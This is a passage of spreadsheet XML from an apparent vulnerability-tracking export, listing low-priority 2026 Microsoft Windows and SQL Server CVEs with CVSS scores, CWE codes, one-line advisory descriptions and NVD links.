      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69504</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K44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4" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69527</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K44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5" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69609</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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6" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-193</t>
        </is>
      </c>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69616</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K44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7" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69627</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K44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8" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69808</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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49" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69862</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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0" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70145</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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1" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70290</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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2" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71341</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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3" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72966</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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4" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72980</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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5" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73004</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K456" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73008</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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57" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77488</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K458" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77491</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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59" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78454</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K46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60" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
